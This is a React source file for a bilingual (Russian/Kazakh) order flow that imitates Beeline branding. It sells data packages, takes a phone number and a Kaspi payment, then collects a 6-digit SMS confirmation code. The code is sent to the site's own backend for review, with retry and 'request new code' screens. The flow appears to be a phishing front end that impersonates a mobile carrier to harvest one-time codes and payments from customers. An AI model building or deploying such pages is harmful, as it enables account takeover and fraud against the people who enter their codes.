import { useEffect, useMemo, useRef, useState } from "react";
import { clientApi, ApiError } from "../../api/client";
import { useRealtime } from "../../realtime/useRealtime";
import { isValidKzPhone, normalizePhone, formatPhoneDisplay } from "../../lib/phone";
import {
  BeelineBrand,
  BeelineHeader,
  PrimaryButton,
  Spinner,
  TrustBadges,
  WhatsAppCta,
  type Lang,
} from "../../components/ClientUI";

interface PackageDto {
  id: string;
  name: string;
  gb: number;
  price: number;
  icon: string;
}

interface OrderDto {
  id: string;
  status: string;
  phone: string;
  packageNameSnapshot: string;
  packageGbSnapshot: number;
  packagePriceSnapshot: number;
  codeAttempts: number;
}

const STORAGE_KEY = "gm_client_state_v1";

function loadStoredOrder(): { orderId: string; recoveryToken: string } | null {
  try {
    const raw = localStorage.getItem(STORAGE_KEY);
    return raw ? JSON.parse(raw) : null;
  } catch {
    return null;
  }
}
function storeOrder(orderId: string, recoveryToken: string) {
  localStorage.setItem(STORAGE_KEY, JSON.stringify({ orderId, recoveryToken }));
}
function clearStoredOrder() {
  localStorage.removeItem(STORAGE_KEY);
}

const ICONS: Record<string, string> = { rocket: "🚀", star: "⭐", diamond: "💎", crown: "👑" };

export default function ClientFlow() {
  const [lang, setLang] = useState<Lang>("ru");
  const [visitorId, setVisitorId] = useState<string | null>(null);
  const [packages, setPackages] = useState<PackageDto[]>([]);
  const [selectedPackage, setSelectedPackage] = useState<PackageDto | null>(null);
  const [phone, setPhone] = useState("+7");
  const [order, setOrder] = useState<OrderDto | null>(null);
  const [recoveryToken, setRecoveryToken] = useState<string | null>(null);
  const [kaspiUrlTemplate, setKaspiUrlTemplate] = useState<string | null>(null);
  const [whatsappUrl, setWhatsappUrl] = useState("https://wa.me/77000000000");
  const [code, setCode] = useState("");
  const [codeError, setCodeError] = useState(false);
  const [loading, setLoading] = useState(false);
  const [formError, setFormError] = useState<string | null>(null);

  const [maintenance, setMaintenance] = useState<{ workingHoursText: string; whatsappUrl: string } | false | null>(null);

  // --- Bootstrap: сначала проверяем режим техобслуживания, затем — восстановление заказа
  // или создание visitor session. Во время техобслуживания сайт намеренно НЕ создаёт
  // новые visitor session и не грузит список пакетов — это и есть смысл "спящего режима":
  // не плодить пустую аналитику, пока владелец сознательно закрыл приём новых заказов.
  useEffect(() => {
    let cancelled = false;

    function bootstrapNormalFlow() {
      const stored = loadStoredOrder();
      if (stored) {
        clientApi
          .getOrder(stored.orderId, stored.recoveryToken)
          .then((res) => {
            setOrder(res.order);
            setRecoveryToken(stored.recoveryToken);
          })
          .catch(() => clearStoredOrder());
        return;
      }
      const params = new URLSearchParams(window.location.search);
      clientApi
        .createVisitor({
          utm_source: params.get("utm_source") ?? undefined,
          utm_medium: params.get("utm_medium") ?? undefined,
          utm_campaign: params.get("utm_campaign") ?? undefined,
          utm_content: params.get("utm_content") ?? undefined,
          utm_term: params.get("utm_term") ?? undefined,
        })
        .then((res) => setVisitorId(res.visitorId))
        .catch(() => {});
      clientApi.listPackages().then((res) => setPackages(res.packages));
    }

    clientApi
      .siteStatus()
      .then((status) => {
        if (cancelled) return;
        if (status.whatsappUrl) setWhatsappUrl(status.whatsappUrl);
        if (status.maintenanceMode) {
          setMaintenance({ workingHoursText: status.workingHoursText, whatsappUrl: status.whatsappUrl || whatsappUrl });
          return;
        }
        setMaintenance(false);
        bootstrapNormalFlow();
      })
      .catch(() => {
        // Если даже проверка статуса не удалась — не блокируем сайт, работаем как обычно.
        if (!cancelled) {
          setMaintenance(false);
          bootstrapNormalFlow();
        }
      });

    return () => {
      cancelled = true;
    };
  }, []);

  // --- Heartbeat, чтобы visitor session не считалась "заброшенной" пока клиент активен ---
  useEffect(() => {
    if (!visitorId) return;
    const interval = setInterval(() => clientApi.heartbeat(visitorId), 30_000);
    return () => clearInterval(interval);
  }, [visitorId]);

  // --- Realtime: как только заказ создан — подписываемся на его комнату ---
  const room = order ? `order:${order.id}` : null;
  useRealtime(room, (event) => {
    if ((event.type === "order.updated" || event.type === "order.created") && event.order.id === order?.id) {
      setOrder(event.order);
    }
  });

  async function handleSelectPackage(pkg: PackageDto) {
    setSelectedPackage(pkg);
    if (visitorId) await clientApi.selectPackage(visitorId, pkg.id).catch(() => {});
  }

  async function handleSubmitPhone() {
    setFormError(null);
    if (!isValidKzPhone(phone)) {
      setFormError(lang === "ru" ? "Проверьте формат номера" : "Нөмір форматын тексеріңіз");
      return;
    }
    if (!visitorId || !selectedPackage) return;
    setLoading(true);
    try {
      const res = await clientApi.createOrder({ visitorId, packageId: selectedPackage.id, phone });
      setOrder(res.order);
      setRecoveryToken(res.recoveryToken);
      setKaspiUrlTemplate(res.kaspiUrlTemplate);
      if (res.whatsappUrl) setWhatsappUrl(res.whatsappUrl);
      storeOrder(res.order.id, res.recoveryToken);
    } catch (e) {
      setFormError(e instanceof ApiError && e.code === "rate_limited"
        ? (lang === "ru" ? "Слишком много попыток с этого номера. Попробуйте позже." : "Бұл нөмірден тым көп әрекет. Кейінірек көріңіз.")
        : (lang === "ru" ? "Не удалось создать заказ. Попробуйте снова." : "Тапсырыс жасалмады. Қайталап көріңіз."));
    } finally {
      setLoading(false);
    }
  }

  const kaspiUrl = useMemo(() => {
    if (!kaspiUrlTemplate || !order) return "#";
    return kaspiUrlTemplate.replace("{amount}", String(order.packagePriceSnapshot)).replace("{shortId}", order.id.slice(0, 8));
  }, [kaspiUrlTemplate, order]);

  async function handleReturnedFromPayment() {
    if (!order || !recoveryToken) return;
    setLoading(true);
    try {
      const res = await clientApi.returnedFromPayment(order.id, recoveryToken);
      setOrder(res.order);
    } finally {
      setLoading(false);
    }
  }

  async function handleRetryPayment() {
    if (!order || !recoveryToken) return;
    setLoading(true);
    try {
      const res = await clientApi.retryPayment(order.id, recoveryToken);
      setOrder(res.order);
    } finally {
      setLoading(false);
    }
  }

  async function handleRequestNewCode() {
    if (!order || !recoveryToken) return;
    setLoading(true);
    try {
      const res = await clientApi.requestNewCode(order.id, recoveryToken);
      setOrder(res.order);
    } finally {
      setLoading(false);
    }
  }

  async function handleSubmitCode() {
    if (!order || !recoveryToken || code.length !== 6) return;
    setLoading(true);
    setCodeError(false);
    try {
      const res = await clientApi.submitCode(order.id, code, recoveryToken);
      setOrder(res.order);
    } catch {
      setCodeError(true);
    } finally {
      setLoading(false);
      setCode("");
    }
  }

  function resetFlow() {
    clearStoredOrder();
    setOrder(null);
    setRecoveryToken(null);
    setSelectedPackage(null);
    setPhone("+7");
    window.location.reload();
  }

  // ---------------- Экраны ----------------

  if (maintenance) {
    return <MaintenanceScreen lang={lang} setLang={setLang} workingHoursText={maintenance.workingHoursText} whatsappUrl={maintenance.whatsappUrl} />;
  }

  if (order) {
    switch (order.status) {
      case "AWAITING_PAYMENT":
        return (
          <PaymentSummaryScreen
            lang={lang}
            setLang={setLang}
            order={order}
            kaspiUrl={kaspiUrl}
            onPaid={handleReturnedFromPayment}
            loading={loading}
          />
        );
      case "PAYMENT_REVIEW":
      case "PAYMENT_CONFIRMED":
        return <WaitingScreen lang={lang} setLang={setLang} order={order} variant="payment" onRetryPayment={handleReturnedFromPayment} whatsappUrl={whatsappUrl} loading={loading} />;
      case "PAYMENT_NOT_FOUND":
        return <WaitingScreen lang={lang} setLang={setLang} order={order} variant="payment" onRetryPayment={handleRetryPayment} whatsappUrl={whatsappUrl} loading={loading} />;
      case "AWAITING_CODE":
        return (
          <CodeEntryScreen
            lang={lang}
            setLang={setLang}
            order={order}
            code={code}
            setCode={setCode}
            onSubmit={handleSubmitCode}
            loading={loading}
            whatsappUrl={whatsappUrl}
            error={codeError}
            onRequestNewCode={handleRequestNewCode}
          />
        );
      case "CODE_SUBMITTED":
      case "CODE_REVIEW":
        return <WaitingScreen lang={lang} setLang={setLang} order={order} variant="code" />;
      case "INVALID_CODE":
        return (
          <InvalidCodeScreen
            lang={lang}
            setLang={setLang}
            code={code}
            setCode={setCode}
            onSubmit={handleSubmitCode}
            loading={loading}
            whatsappUrl={whatsappUrl}
            attemptsLeft={Math.max(0, 3 - order.codeAttempts)}
            error={codeError}
            onRequestNewCode={handleRequestNewCode}
          />
        );
      case "COMPLETED":
        return <SuccessScreen lang={lang} setLang={setLang} order={order} whatsappUrl={whatsappUrl} onNewOrder={resetFlow} />;
      case "ACTIVATION_IMPOSSIBLE":
      case "REFUND_PENDING":
      case "REFUND_PROCESSING":
        return <ImpossibleScreen lang={lang} setLang={setLang} order={order} whatsappUrl={whatsappUrl} />;
      case "REFUNDED":
        return <RefundedScreen lang={lang} setLang={setLang} order={order} onNewOrder={resetFlow} />;
      case "EXPIRED":
      case "CANCELLED":
        return <ExpiredScreen lang={lang} setLang={setLang} onRestart={resetFlow} />;
      default:
        return <WaitingScreen lang={lang} setLang={setLang} order={order} variant="payment" />;
    }
  }

  if (selectedPackage) {
    return (
      <PhoneEntryScreen
        lang={lang}
        setLang={setLang}
        pkg={selectedPackage}
        phone={phone}
        setPhone={setPhone}
        onBack={() => setSelectedPackage(null)}
        onSubmit={handleSubmitPhone}
        loading={loading}
        error={formError}
      />
    );
  }

  return <PackagesScreen lang={lang} setLang={setLang} packages={packages} onSelect={handleSelectPackage} />;
}

// ---------------- Отдельные экраны (соответствуют присланным макетам) ----------------

function Shell({ lang, setLang, onBack, children }: { lang: Lang; setLang: (l: Lang) => void; onBack?: () => void; children: React.ReactNode }) {
  return (
    <div className="min-h-screen bg-neutral-50 pb-10">
      <BeelineHeader lang={lang} onLangChange={setLang} onBack={onBack} />
      <BeelineBrand />
      <div className="mx-auto mt-6 max-w-md">{children}</div>
    </div>
  );
}

function PackagesScreen({ lang, setLang, packages, onSelect }: { lang: Lang; setLang: (l: Lang) => void; packages: PackageDto[]; onSelect: (p: PackageDto) => void }) {
  const colors = ["from-amber-50 to-amber-100 text-amber-600", "from-blue-50 to-blue-100 text-blue-600", "from-violet-50 to-violet-100 text-violet-600", "from-amber-50 to-amber-100 text-amber-600"];
  return (
    <Shell lang={lang} setLang={setLang}>
      <p className="px-5 text-center text-sm text-neutral-500">
        {lang === "ru" ? "Нажмите на выбранный тариф ↓" : "Таңдалған тарифті басыңыз ↓"}
      </p>
      <div className="mt-5 space-y-3 px-5">
        {packages.map((pkg, i) => (
          <button
            key={pkg.id}
            onClick={() => onSelect(pkg)}
            className={`flex w-full items-center justify-between rounded-2xl bg-gradient-to-br ${colors[i % colors.length]} p-4 text-left shadow-card transition hover:-translate-y-0.5`}
          >
            <div className="flex items-center gap-3">
              <div className="flex h-12 w-12 items-center justify-center rounded-full bg-white text-2xl shadow-sm">{ICONS[pkg.icon] ?? "⭐"}</div>
              <div>
                <div className="text-lg font-extrabold text-neutral-900">{pkg.name}</div>
                <div className="text-sm font-semibold">{pkg.gb} ГБ</div>
              </div>
            </div>
            <div className="rounded-lg bg-white/70 px-3 py-1.5 font-bold text-neutral-900">{pkg.price} ₸</div>
          </button>
        ))}
        {packages.length === 0 && <div className="py-10 text-center text-neutral-400">{lang === "ru" ? "Загрузка тарифов…" : "Тарифтер жүктелуде…"}</div>}
      </div>
      <TrustBadges lang={lang} />
    </Shell>
  );
}

function PhoneEntryScreen({
  lang, setLang, pkg, phone, setPhone, onBack, onSubmit, loading, error,
}: {
  lang: Lang; setLang: (l: Lang) => void; pkg: PackageDto; phone: string; setPhone: (p: string) => void;
  onBack: () => void; onSubmit: () => void; loading: boolean; error: string | null;
}) {
  return (
    <Shell lang={lang} setLang={setLang} onBack={onBack}>
      <div className="px-5">
        <h2 className="text-center text-xl font-extrabold text-neutral-900">{lang === "ru" ? "Вы выбрали тариф" : "Сіз тарифті таңдадыңыз"}</h2>
        <div className="mt-4 flex items-center justify-between rounded-2xl border border-blue-100 bg-blue-50 p-4">
          <div className="flex items-center gap-3">
            <div className="flex h-12 w-12 items-center justify-center rounded-full bg-white text-2xl">{ICONS[pkg.icon] ?? "⭐"}</div>
            <div>
              <div className="text-lg font-extrabold">{pkg.name}</div>
              <div className="text-sm font-semibold text-blue-600">{pkg.gb} ГБ</div>
            </div>
          </div>
          <div className="rounded-lg bg-blue-100 px-3 py-1.5 font-bold text-blue-700">{pkg.price} ₸</div>
        </div>

        <div className="mt-6">
          <div className="font-bold text-neutral-900">{lang === "ru" ? "Введите номер Beeline" : "Beeline нөмірін енгізіңіз"}</div>
          <p className="mt-1 text-sm text-neutral-500">
            {lang === "ru" ? "Укажите номер телефона для подключения выбранного тарифа." : "Тарифті қосу үшін телефон нөміріңізді көрсетіңіз."}
          </p>
          <input
            value={phone}
            onChange={(e) => setPhone(normalizePhone(e.target.value))}
            inputMode="tel"
            placeholder="+7 ___ ___ __ __"
            className="mt-3 w-full rounded-2xl border border-neutral-200 px-4 py-4 text-lg font-semibold outline-none focus:border-beeline-gold"
          />
          {error && <p className="mt-2 text-sm font-medium text-red-600">{error}</p>}
        </div>

        <div className="mt-6">
          <PrimaryButton onClick={onSubmit} disabled={loading}>
            {loading ? <Spinner size={20} /> : <>{lang === "ru" ? "ПРОДОЛЖИТЬ" : "ЖАЛҒАСТЫРУ"} →</>}
          </PrimaryButton>
        </div>
      </div>
      <TrustBadges lang={lang} />
    </Shell>
  );
}

function PaymentSummaryScreen({ lang, setLang, order, kaspiUrl, onPaid, loading }: { lang: Lang; setLang: (l: Lang) => void; order: OrderDto; kaspiUrl: string; onPaid: () => void; loading: boolean }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5">
        <div className="rounded-3xl bg-white p-6 text-center shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-emerald-50 text-2xl text-emerald-500">✓</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Отлично!" : "Керемет!"}</h2>
          <p className="text-sm text-neutral-500">{lang === "ru" ? "Вы ввели номер:" : "Сіз нөмірді енгіздіңіз:"}</p>
          <div className="mt-3 rounded-xl bg-amber-50 px-4 py-2 font-bold">{formatPhoneDisplay(order.phone)}</div>
          <div className="mt-4 flex items-center justify-between border-t border-neutral-100 pt-4 text-left">
            <div>
              <div className="text-sm text-neutral-500">{lang === "ru" ? "Выбранный пакет" : "Таңдалған пакет"}</div>
              <div className="font-bold text-blue-600">{order.packageGbSnapshot} ГБ</div>
            </div>
            <div className="text-xl font-extrabold">{order.packagePriceSnapshot} ₸</div>
          </div>
        </div>

        <div className="mt-4 rounded-2xl bg-amber-50 p-4">
          <p className="text-sm font-semibold text-neutral-700">
            {lang === "ru" ? "Для активации тарифа совершите оплату по Kaspi" : "Тарифті іске қосу үшін Kaspi арқылы төлем жасаңыз"}
          </p>
          <a href={kaspiUrl} target="_blank" rel="noreferrer" onClick={() => setTimeout(onPaid, 300)}>
            <div className="mt-3">
              <PrimaryButton variant="kaspi">{lang === "ru" ? "ОПЛАТИТЬ ЧЕРЕЗ KASPI" : "KASPI АРҚЫЛЫ ТӨЛЕУ"} →</PrimaryButton>
            </div>
          </a>
          <button onClick={onPaid} disabled={loading} className="mt-3 w-full text-center text-sm font-semibold text-neutral-500 underline">
            {loading ? "…" : lang === "ru" ? "Я уже оплатил(а)" : "Мен төледім"}
          </button>
        </div>
      </div>
    </Shell>
  );
}

function WaitingScreen({ lang, setLang, order, variant, onRetryPayment, whatsappUrl, loading }: {
  lang: Lang; setLang: (l: Lang) => void; order: OrderDto; variant: "payment" | "code";
  onRetryPayment?: () => void; whatsappUrl?: string; loading?: boolean;
}) {
  const title =
    order.status === "PAYMENT_CONFIRMED"
      ? lang === "ru" ? "Готовим для вас новый код…" : "Сізге жаңа код дайындап жатырмыз…"
      : variant === "payment"
      ? lang === "ru" ? "Проверяем платёж…" : "Төлемді тексеріп жатырмыз…"
      : lang === "ru" ? "Проверяем код…" : "Кодты тексеріп жатырмыз…";
  const notFound = order.status === "PAYMENT_NOT_FOUND";
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5 text-center">
        <div className="rounded-3xl bg-white p-8 shadow-card">
          {notFound ? (
            <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-amber-50 text-2xl">⚠️</div>
          ) : (
            <div className="flex justify-center"><Spinner /></div>
          )}
          <h2 className="mt-4 text-xl font-extrabold">
            {notFound ? (lang === "ru" ? "Возникла ошибка с оплатой" : "Төлемде қате пайда болды") : title}
          </h2>
          {notFound ? (
            <p className="mt-2 text-sm text-neutral-500">
              {lang === "ru"
                ? "Мы пока не нашли ваш платёж. Попробуйте оплатить ещё раз или напишите нам в WhatsApp — поможем разобраться."
                : "Төлеміңізді әлі таппадық. Қайта төлеп көріңіз немесе WhatsApp-қа жазыңыз — көмектесеміз."}
            </p>
          ) : (
            <p className="mt-2 text-sm text-neutral-500">
              {lang === "ru" ? "Пожалуйста, подождите несколько минут. Не закрывайте страницу." : "Бірнеше минут күтіңіз. Бетті жаппаңыз."}
            </p>
          )}
          <div className="mt-4 grid grid-cols-3 gap-2 text-left text-xs text-neutral-500">
            <div><div className="text-neutral-400">{lang === "ru" ? "Пакет" : "Пакет"}</div><div className="font-bold text-neutral-800">{order.packageGbSnapshot} ГБ</div></div>
            <div><div className="text-neutral-400">{lang === "ru" ? "К оплате" : "Төлем"}</div><div className="font-bold text-neutral-800">{order.packagePriceSnapshot} ₸</div></div>
            <div><div className="text-neutral-400">Beeline</div><div className="font-bold text-neutral-800">{formatPhoneDisplay(order.phone)}</div></div>
          </div>
          {notFound && onRetryPayment && (
            <div className="mt-5">
              <PrimaryButton onClick={onRetryPayment} disabled={loading}>
                {loading ? <Spinner size={20} /> : lang === "ru" ? "ПОВТОРИТЬ ОПЛАТУ" : "ТӨЛЕМДІ ҚАЙТАЛАУ"}
              </PrimaryButton>
            </div>
          )}
        </div>
        {notFound && whatsappUrl && <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />}
      </div>
    </Shell>
  );
}

function CodeEntryScreen({ lang, setLang, order, code, setCode, onSubmit, loading, whatsappUrl, error, onRequestNewCode }: {
  lang: Lang; setLang: (l: Lang) => void; order: OrderDto; code: string; setCode: (c: string) => void; onSubmit: () => void; loading: boolean; whatsappUrl: string; error: boolean; onRequestNewCode: () => void;
}) {
  const inputsRef = useRef<Array<HTMLInputElement | null>>([]);

  function setDigit(index: number, value: string) {
    const digit = value.replace(/\D/g, "").slice(-1);
    const next = code.split("");
    while (next.length < 6) next.push("");
    next[index] = digit;
    const joined = next.join("").slice(0, 6);
    setCode(joined);
    if (digit && index < 5) inputsRef.current[index + 1]?.focus();
  }

  function handleKeyDown(index: number, e: React.KeyboardEvent<HTMLInputElement>) {
    if (e.key === "Backspace" && !code[index] && index > 0) {
      inputsRef.current[index - 1]?.focus();
    }
  }

  function handlePaste(e: React.ClipboardEvent<HTMLInputElement>) {
    const pasted = e.clipboardData.getData("text").replace(/\D/g, "").slice(0, 6);
    if (pasted) {
      e.preventDefault();
      setCode(pasted);
      inputsRef.current[Math.min(pasted.length, 5)]?.focus();
    }
  }

  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5">
        <div className="rounded-3xl bg-white p-6 text-center shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-emerald-50 text-2xl">📩</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Вам выслан код подтверждения" : "Сізге растау коды жіберілді"}</h2>
          <p className="mt-1 text-sm text-neutral-500">
            {lang === "ru" ? "Мы отправили 6-значный код на номер" : "6 таңбалы код жіберілді"} {formatPhoneDisplay(order.phone)}.
          </p>
          <div className="mt-4 rounded-xl bg-emerald-50 p-3 text-left text-sm text-emerald-700">
            {lang === "ru" ? "Код действителен в течение 10 минут. Не передавайте его третьим лицам." : "Код 10 минут ішінде жарамды. Оны басқаларға бермеңіз."}
          </div>
          <div className="mt-5 flex justify-center gap-2">
            {Array.from({ length: 6 }).map((_, i) => (
              <input
                key={i}
                ref={(el) => { inputsRef.current[i] = el; }}
                value={code[i] ?? ""}
                onChange={(e) => setDigit(i, e.target.value)}
                onKeyDown={(e) => handleKeyDown(i, e)}
                onPaste={handlePaste}
                inputMode="numeric"
                maxLength={1}
                aria-label={`${lang === "ru" ? "Цифра кода" : "Код саны"} ${i + 1}`}
                className="h-14 w-10 rounded-xl border border-neutral-200 text-center text-xl font-bold outline-none focus:border-beeline-gold"
              />
            ))}
          </div>
          <div className="mt-5">
            {error && (
              <p className="mb-3 text-sm font-semibold text-red-600">
                {lang === "ru" ? "Не удалось отправить код. Проверьте связь и попробуйте снова." : "Кодты жіберу мүмкін болмады. Байланысты тексеріп, қайталаңыз."}
              </p>
            )}
            <PrimaryButton onClick={onSubmit} disabled={code.length !== 6 || loading}>
              {loading ? <Spinner size={20} /> : <>{lang === "ru" ? "ПОДТВЕРДИТЬ" : "РАСТАУ"} →</>}
            </PrimaryButton>
            <button onClick={onRequestNewCode} disabled={loading} className="mt-3 w-full text-center text-sm font-semibold text-neutral-400 underline disabled:opacity-50">
              {lang === "ru" ? "Не пришёл код? Запросить новый" : "Код келмеді ме? Жаңасын сұрау"}
            </button>
          </div>
        </div>
        <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />
      </div>
    </Shell>
  );
}

function InvalidCodeScreen({ lang, setLang, code, setCode, onSubmit, loading, whatsappUrl, attemptsLeft, error, onRequestNewCode }: {
  lang: Lang; setLang: (l: Lang) => void; code: string; setCode: (c: string) => void; onSubmit: () => void; loading: boolean; whatsappUrl: string; attemptsLeft: number; error: boolean; onRequestNewCode: () => void;
}) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5">
        <div className="rounded-3xl bg-white p-6 text-center shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-red-50 text-2xl text-red-500">✕</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Код не подошёл" : "Код сәйкес келмеді"}</h2>
          <p className="mt-1 text-sm text-neutral-500">
            {lang === "ru" ? "Проверьте введённые цифры и попробуйте снова или запросите новый код." : "Енгізген сандарды тексеріп, қайта көріңіз немесе жаңа код сұраңыз."}
          </p>
          <div className="mt-3 rounded-xl bg-red-50 p-3 text-sm font-semibold text-red-600">
            {lang === "ru" ? `Осталось попыток: ${attemptsLeft}` : `Қалған әрекет: ${attemptsLeft}`}
          </div>
          <input
            value={code}
            onChange={(e) => setCode(e.target.value.replace(/\D/g, "").slice(0, 6))}
            inputMode="numeric"
            placeholder="000000"
            className="mt-4 w-full rounded-xl border border-red-200 px-4 py-3 text-center text-lg font-bold tracking-widest"
          />
          {error && (
            <p className="mt-2 text-sm font-semibold text-red-600">
              {lang === "ru" ? "Не удалось отправить код. Попробуйте ещё раз." : "Кодты жіберу мүмкін болмады. Қайталап көріңіз."}
            </p>
          )}
          <div className="mt-4">
            <PrimaryButton onClick={onSubmit} disabled={code.length !== 6 || loading || attemptsLeft === 0}>
              {loading ? <Spinner size={20} /> : lang === "ru" ? "ВВЕСТИ ПОВТОРНО" : "ҚАЙТА ЕНГІЗУ"}
            </PrimaryButton>
            <button onClick={onRequestNewCode} disabled={loading} className="mt-3 w-full text-center text-sm font-semibold text-neutral-400 underline disabled:opacity-50">
              {lang === "ru" ? "Запросить новый код" : "Жаңа код сұрау"}
            </button>
          </div>
        </div>
        <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />
      </div>
    </Shell>
  );
}

function SuccessScreen({ lang, setLang, order, whatsappUrl, onNewOrder }: { lang: Lang; setLang: (l: Lang) => void; order: OrderDto; whatsappUrl: string; onNewOrder: () => void }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5">
        <div className="rounded-3xl bg-white p-6 text-center shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-emerald-50 text-2xl text-emerald-500">✓</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Всё готово!" : "Дайын!"}</h2>
          <p className="mt-1 text-sm text-neutral-500">
            {order.packageGbSnapshot} {lang === "ru" ? "ГБ поступят на ваш номер в течение нескольких минут." : "ГБ бірнеше минут ішінде нөміріңізге түседі."}
          </p>
          <div className="mt-4 grid grid-cols-3 gap-2 border-t border-neutral-100 pt-4 text-left text-xs">
            <div><div className="text-neutral-400">Beeline</div><div className="font-bold">{formatPhoneDisplay(order.phone)}</div></div>
            <div><div className="text-neutral-400">{lang === "ru" ? "Пакет" : "Пакет"}</div><div className="font-bold">{order.packageGbSnapshot} ГБ</div></div>
            <div><div className="text-neutral-400">{lang === "ru" ? "Оплачено" : "Төленді"}</div><div className="font-bold">{order.packagePriceSnapshot} ₸</div></div>
          </div>
        </div>
        <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />
        <button onClick={onNewOrder} className="mt-4 w-full text-center text-sm font-semibold text-neutral-400 underline">
          {lang === "ru" ? "Подключить ещё один пакет" : "Тағы бір пакет қосу"}
        </button>
      </div>
    </Shell>
  );
}

function ImpossibleScreen({ lang, setLang, order, whatsappUrl }: { lang: Lang; setLang: (l: Lang) => void; order: OrderDto; whatsappUrl: string }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5">
        <div className="rounded-3xl bg-white p-6 text-center shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-red-50 text-2xl">📵</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Активация невозможна" : "Белсендіру мүмкін емес"}</h2>
          <p className="mt-1 text-sm text-neutral-500">
            {lang === "ru" ? "К сожалению, подключение выбранного пакета на этот номер недоступно." : "Өкінішке орай, таңдалған пакетті бұл нөмірге қосу мүмкін емес."}
          </p>
          <div className="mt-4 rounded-xl bg-emerald-50 p-3 text-left text-sm text-emerald-700">
            {lang === "ru"
              ? "Оплаченная сумма будет возвращена тем же способом, которым была произведена оплата."
              : "Төленген сома төлем жасалған әдіспен қайтарылады."}
          </div>
          <div className="mt-4 grid grid-cols-3 gap-2 border-t border-neutral-100 pt-4 text-left text-xs">
            <div><div className="text-neutral-400">Beeline</div><div className="font-bold">{formatPhoneDisplay(order.phone)}</div></div>
            <div><div className="text-neutral-400">{lang === "ru" ? "Пакет" : "Пакет"}</div><div className="font-bold">{order.packageGbSnapshot} ГБ</div></div>
            <div><div className="text-neutral-400">{lang === "ru" ? "Сумма" : "Сома"}</div><div className="font-bold">{order.packagePriceSnapshot} ₸</div></div>
          </div>
        </div>
        <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />
      </div>
    </Shell>
  );
}

function RefundedScreen({ lang, setLang, order, onNewOrder }: { lang: Lang; setLang: (l: Lang) => void; order: OrderDto; onNewOrder: () => void }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5 text-center">
        <div className="rounded-3xl bg-white p-6 shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-emerald-50 text-2xl text-emerald-500">✓</div>
          <h2 className="mt-3 text-xl font-extrabold">{lang === "ru" ? "Средства возвращены" : "Қаражат қайтарылды"}</h2>
          <p className="mt-1 text-sm text-neutral-500">{order.packagePriceSnapshot} ₸ {lang === "ru" ? "возвращены на ваш способ оплаты." : "төлем әдісіңізге қайтарылды."}</p>
        </div>
        <button onClick={onNewOrder} className="mt-4 w-full text-center text-sm font-semibold text-neutral-400 underline">
          {lang === "ru" ? "Попробовать снова" : "Қайта көру"}
        </button>
      </div>
    </Shell>
  );
}

function ExpiredScreen({ lang, setLang, onRestart }: { lang: Lang; setLang: (l: Lang) => void; onRestart: () => void }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5 text-center">
        <div className="rounded-3xl bg-white p-6 shadow-card">
          <h2 className="text-xl font-extrabold">{lang === "ru" ? "Заказ отменён" : "Тапсырыс жойылды"}</h2>
          <p className="mt-1 text-sm text-neutral-500">{lang === "ru" ? "Время ожидания истекло." : "Күту уақыты аяқталды."}</p>
          <div className="mt-4"><PrimaryButton onClick={onRestart}>{lang === "ru" ? "Начать заново" : "Қайта бастау"}</PrimaryButton></div>
        </div>
      </div>
    </Shell>
  );
}

function MaintenanceScreen({ lang, setLang, workingHoursText, whatsappUrl }: { lang: Lang; setLang: (l: Lang) => void; workingHoursText: string; whatsappUrl: string }) {
  return (
    <Shell lang={lang} setLang={setLang}>
      <div className="px-5 text-center">
        <div className="rounded-3xl bg-white p-8 shadow-card">
          <div className="mx-auto flex h-14 w-14 items-center justify-center rounded-full bg-amber-50 text-2xl">🛠️</div>
          <h2 className="mt-4 text-xl font-extrabold">{lang === "ru" ? "Ведутся технические работы" : "Техникалық жұмыстар жүргізілуде"}</h2>
          <p className="mt-2 text-sm text-neutral-500">
            {lang === "ru"
              ? `Сайт временно не принимает новые заказы. Мы работаем ${workingHoursText}.`
              : `Сайт уақытша жаңа тапсырыстарды қабылдамайды. Біз ${workingHoursText} жұмыс істейміз.`}
          </p>
        </div>
        <WhatsAppCta lang={lang} whatsappUrl={whatsappUrl} />
      </div>
    </Shell>
  );
}